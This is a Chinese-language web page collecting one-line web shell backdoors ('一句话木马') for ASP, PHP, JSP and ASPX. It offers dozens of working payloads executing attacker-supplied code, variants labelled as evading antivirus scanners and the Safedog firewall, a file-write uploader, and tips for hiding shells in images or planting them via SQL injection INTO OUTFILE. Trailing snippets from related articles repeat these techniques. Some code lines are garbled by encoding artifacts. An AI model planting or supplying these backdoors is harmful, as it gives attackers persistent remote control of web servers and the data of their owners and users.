各种一句话木马大全

在互联网发达的今天,各种水平的程序用应时而生,不注重安全,导致很多网站都被挂马,这样的一句话后门是黑客最喜欢的,隐藏性好,这里将代码分享给大家,大家可以通过查找工具查找替换

<%eval request("c")%>
<%execute request("c")%>
<%execute(request("c"))%>
<%ExecuteGlobal request("sb")%>
%><%Eval(Request(chr(35)))%><%
<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>
<%eval(Request.Item["c"],"unsafe");%>
‘备份专用
<%eval(request("c")):response.end%>
‘无防下载表,有防下载表突破专用一句话
<%execute request("c")%><%<%loop<%:%>
<%<%loop<%:%><%execute request("c")%>
<%execute request("c")<%loop<%:%>
‘防杀防扫专用
<%if Request("c")<>"" ThenExecuteGlobal(Request("c"))%>
‘不用"<,>"
<script language=VBScript runat=server>execute request("c")</script>
<% @Language="JavaScript" CodePage="65001"var lcx={‘名字‘:Request.form(‘#‘),‘性别‘:eval,‘年龄‘:‘18‘,‘昵称‘:‘请叫我一声老大‘};lcx.性别((lcx.
名字)+‘‘) %>
<script language=vbs runat=server>eval(request("c"))</script>
<script language=vbs runat=server>eval_r(request("c"))</script>
‘不用双引号
<%eval request(chr(35))%>
‘可以躲过雷客图
<%set
ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript" ms.AddObject"response",response ms.AddObject

"request",request ms.ExecuteStatement("ev"&"al(request(""c""))")%>
<%dy=request("dy")%><%Eval(dy)%>
‘容错代码
if Request("sb")<>"" then ExecuteGlobal request("sb") end if
PHP一句话

复制代码 代码如下:

<?php eval($_POST1);?>
<?php if(isset($_POST[‘c‘])){eval($_POST[‘c‘]);}?>
<?php system($_REQUEST1);?>
<?php ([email protected]$_GET1)[email protected]$_($_POST1)?>
<?php eval_r($_POST1)?>
<?php @eval_r($_POST1)?>//容错代码
<?php assert($_POST1);?>//使用Lanker一句话客户端的专家模式执行相关的PHP语句
<?$_POST[‘c‘]($_POST[‘cc‘]);?>
<?$_POST[‘c‘]($_POST[‘cc‘],$_POST[‘cc‘])?>
<?php

@preg_replace("/[email]/e",$_POST[‘h‘],"error");?>/*使用这个后,使用菜刀一句话客户端在
配置连接的时候在"配置"一栏输入*/:<O>[email protected]_r($_POST1);</O>
<?php echo `$_GET[‘r‘]` ?>
//绕过<?限制的一句话
<script language="php">@eval_r($_POST[sb])</script>

JSP一句话

复制代码 代码如下:

<%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream
(application.getRealPath("\\")+request.getParameter("f"))).write
(request.getParameter("t").getBytes());%>
提交客户端
<form
action=""
method="post"><textareaname="t"></textarea><br/><input
type="submit"value="提交"></form>
ASPX一句话
<script language="C#"runat="server">WebAdmin2Y.x.y a=new WebAdmin2Y.x.y("add6bb58e139be10")</script>

再补充几个:

推荐还是把一句话加进图片里面去。
普通的php一句话:<?php @eval($_POST[‘r00ts‘]);?>
普通的asp一句话:<%eval(Request.Item["r00ts"],”unsafe”);%>
aspx突破一流的:
[code]
dim da
set fso=server.createobject("scripting.filesystemobject")
path=request("path")
if path<>"" then
data=request("da")
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
Response.Write "yes"
else
Response.Write "no"
end if
err.clear
end if
set da=nothing
set fos=nothing
Response.Write "<form action=" method=post>"
Response.Write "<input type=text name=path>"
Response.Write "<br>"
Response.Write "当前文件路径:"&server.mappath(request.servervariables("script_name"))
Response.Write "<br>"
Response.Write "操作系统为:"&Request.ServerVariables("OS")
Response.Write "<br>"
Response.Write "WEB服务器版本为:"&Request.ServerVariables("SERVER_SOFTWARE")
Response.Write "<br>"
Response.Write "<textarea name=da cols=50 rows=10 width=30></textarea>"
Response.Write "<br>"
Response.Write "<input type=submit value=save>"
Response.Write "</form>"
</Script>

ASP一句话:<%IfRequest(“1″)<>”"ThenExecuteGlobal(Request(“1″))%>

PHP防杀放扫 一句话:<?php (])?>
上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错,比如
index.asp里面也是可以的!

因为加了判断!加了判断的PHP一句话,与上面的ASP一句话相同道理,也是可以插在任何PHP文件
的最底部不会出错!<?if(isset($_POST[‘1‘])){eval($_POST[‘1‘]);}?><?php system
($_REQUEST[1]);?>

无防下载表,有防下载表可尝试插入以下语句突破的一句话
<%execute request(“class”)%><%‘<% loop <%:%><%‘<% loop <%:%><%execute request
(“class”)%><%execute request(“class”)‘<% loop <%:%>

备份专用<%eval(request(“1″)):response.end%>

asp一句话<%execute(request(“1″))%>
aspx一句话:<scriptrunat=”server”>WebAdmin2Y.x.y aaaaa =newWebAdmin2Y.x.y
(“add6bb58e139be10″);</script>

可以躲过雷客图的一句话。
<%set ms = server.CreateObject(“MSScriptControl.ScriptControl.1″)
ms.Language=”VBScript”ms.AddObject”Response”,Responsems.AddObject”request”,
requestms.ExecuteStatement(“ev”&”al(request(“”1″”))”)%>

不用‘<,>‘的asp一句话<scriptrunat=server>execute request(“1″)</script>

不用双引号的一句话。<%eval request(chr(35))%>

时间: 2024-08-30 09:53:45

各种一句话木马大全的相关文章

脚本后门注入图片新方法&lt;图片+一句话木马&gt;

创建一个 shell.php 的一句话木马,通过 window 下 copy 命令 copy 123.png+shell.php  123.png 重新生成一个 123.png 的图片. 上传到服务服务器上,直接拿菜刀连.

各种过安全狗一句话木马

几个变性的asp–过防火墙 过狗效果都不错 <%Y=request("x")%> <%execute(Y)%> <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("sz"))%> 这个是90sec发的 <%eval""&("e"&"v"&&

渗透技术--SQL注入写一句话木马原理

讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子: SELECT * INTO OUTFILE 'C:\log1.txt' 这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面.利用这个原理我们可以把PHP的一句话木马写到磁盘上从而拿到webshell. 本地的目标站点来实战一下,我们的目的是在目标的物理路径D:/WWW/下面生成一个php文件,从而可以使我们用菜刀连接上去: 先简单的判断

常见的一句话木马

一句话木马入侵原理 <%execute request("#")%>是典型的一句话木马服务端代码,将这个代码写入asp文件,就成了一句话木马服务端文件. 仔细观察一下<%execute request("#")%>这句代码,括号里的"#"是我们一句话的密码,我们可以把它改成任意字符,这样可以避免别人发现我们的一句话木马后,轻松的通过它捡个大便宜,如果我们上传的一句话代码为<%execute request("

一句话木马

1.一句话说明 常用的一句话有冰狐浪子的一句话,蓝屏的,lack2的,当然还有海洋的.我们如果知道了一句话的原理.自己也可以很轻松的写一个. <%execute(request("cmd"))%> <%execute request("1")%> ASP一句话16进制:┼攠數畣整爠煥敵瑳∨≡┩愾 密码a 2.简单演示 1>.一句话你要写入数据库,数据库必须是asp格式或者我们能够通过备份备份为asp格式.用客户端连接这个asp的数据库.

关于asp、php,jps一句话木马--中国菜刀使用

工具下载地址:http://pan.baidu.com/s/1o6jxAgq 这里的asp后门不指像那些一句话木马.砍客.冰狐.明小子之类的b/s型的,只指像cmd.asp或2005a.asp的. 第一个,来看zzzeva免fso的cmd.asp 代码如下:<form method="post"> <input type=text name="cmd" size=60> <input type=submit value="ru

DBO权限日志备份专用一句话木马 - 寒龙网出品 以前的博客站因为程序错乱改为反病毒联盟后 本博客基于博客园地 感谢关注

备分专用一句话 加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小. 日志备分WEBSHELL标准的七步: 1.InjectionURL';alter database XXX set RECOVERY FULL-- (把sql设置成日志完全恢复模式) 2.InjectionURL';create table cmd (a image)-- (新建立一个cmd表) 3.InjectionURL';backup lo

常用一句话木马

asp一句话木马: <%execute(request("value"))%> php一句话木马: <?php @eval($_POST[value]);?> aspx一句话木马: <%@ Page Language="Jscript"%> <%eval(Request.Item["value"])%> 其他一句话木马: <%eval request("value")%&g

一句话木马(webshell)是如何执行命令的

在很多的渗透过程中,渗透人员会上传一句话木马(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp.php.jsp.aspx都是如此,那么一句话木马到底是如何执行的呢,下面我们就对webshell进行一个简单的分析. 首先我们先看一个原始而又简单的php一句话木马. <?php @eval($_POST['cmd']); ?> 看到这里不得不赞美前辈的智慧. 对于一个稍微懂一些php的人而言,或者初级的安全爱好者,或者脚本小子而言,看到的第一眼就是密码是cmd,通过pos